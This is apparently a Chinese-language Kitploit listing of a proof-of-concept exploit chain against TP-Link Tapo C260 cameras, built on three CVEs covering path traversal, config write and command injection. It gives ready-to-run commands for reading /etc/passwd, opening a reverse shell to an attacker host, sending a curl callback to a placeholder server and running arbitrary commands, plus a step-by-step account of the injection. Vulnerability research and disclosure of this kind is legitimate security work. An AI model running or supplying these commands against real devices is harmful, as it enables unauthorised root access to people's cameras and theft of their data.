Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
tapo-c260-rce — TP-Link Tapo C260 摄像头的 PoC 漏洞利用链 — CVE-2026-0651/0652/0653。由 @spaceraccoon 研究。 | Kitploit
工具/GitHubGitHub/l0lsec/tapo-c260-rce
嵌入式系统安全物联网安全漏洞分析漏洞利用Web应用程序漏洞利用硬件黑客渗透测试命令与控制硬件与物联网安全固件分析
GitHubl0lsec/tapo-c260-rce

tapo-c260-rce

125个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

TP-Link Tapo C260 摄像头的 PoC 漏洞利用链 — CVE-2026-0651/0652/0653。由 @spaceraccoon 研究。

查看仓库

Tapo C260 RCE 漏洞链(CVE-2026-0651 / CVE-2026-0652 / CVE-2026-0653)

针对 TP-Link Tapo C260 网络摄像头的概念验证漏洞利用链,通过串联由 Eugene Lim (Spaceraccoon) 发现的三个漏洞,实现从未认证到 root 权限的远程代码执行(RCE)。

致谢

所有漏洞研究与发现均由 Eugene Lim (@spaceraccoon) 完成。

本仓库是基于其公开文章实现的 PoC。如果你觉得有用,请购买他的著作: From Day Zero to Zero Day: A Hands-On Guide to Vulnerability Research (No Starch Press)。

漏洞链

CVE类型影响
CVE-2026-0651路径遍历 / 本地文件泄露通过 HTTP GET 处理器中的 /%2e%2e%2f 读取任意文件
CVE-2026-0652任意配置写入访客级用户可通过云 API 中的 JSON 键操纵写入任意配置路径
CVE-2026-0653命令注入 / 权限提升set_region_code_handle 将未经过滤的 dev_name 配置值传递给 popen()

攻击链

root@kitploit:~
LFD(读取设备配置)--> 配置写入(污染 dev_name)--> 触发区域代码处理器 --> popen() --> shell

环境要求

  • Python 3.8+
  • 可访问摄像头的网络(用于 LFD)或有效的 TP-Link 云认证令牌(用于 RCE)
  • 访客级凭据即可完成完整攻击链

安装

root@kitploit:~
git clone https://github.com/<you>/tapo-c260-rce.git
cd tapo-c260-rce
pip install -r requirements.txt

使用方法

本地文件泄露(CVE-2026-0651)

从本地网络中的摄像头读取任意文件:

root@kitploit:~
python lfd.py --host 192.168.1.100 --token <stok_token> --file /etc/passwd

完整 RCE 攻击链(CVE-2026-0651 + CVE-2026-0652 + CVE-2026-0653)

root@kitploit:~
# 反向 Shell
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --lhost <YOUR_IP> \
  --lport 4444

# 仅回调(curl ping)
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --callback http://your-server.com/pwned

# 自定义命令
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --cmd "id > /tmp/pwned"

工作原理

  1. 污染 — 发送带有被操纵 JSON 键的 setLedStatus 请求,将 shell 元字符载荷写入设备上的 tp_manage/info/dev_name 配置路径。

  2. 触发 — 发送 set_region_code 请求。处理器从配置中读取 dev_name,并将其未经净化地插入 popen() 调用中,从而执行注入的命令。

  3. Shell — 攻击者收到回调或反向 shell。

受影响固件

  • TP-Link Tapo C260(补丁前固件)
  • 其他可能共享相同 /bin/main 综合二进制文件的 Tapo 型号

免责声明

本工具仅供授权安全测试和教育目的使用。未经授权访问计算机系统属违法行为。作者不对滥用行为负责。在针对任何非你所有的设备进行测试前,务必获得明确许可。

参考资料

  • 原始文章 — Spaceraccoon
  • Kennedn 的 Tapo 协议研究
  • TP-Link 安全公告
下载工具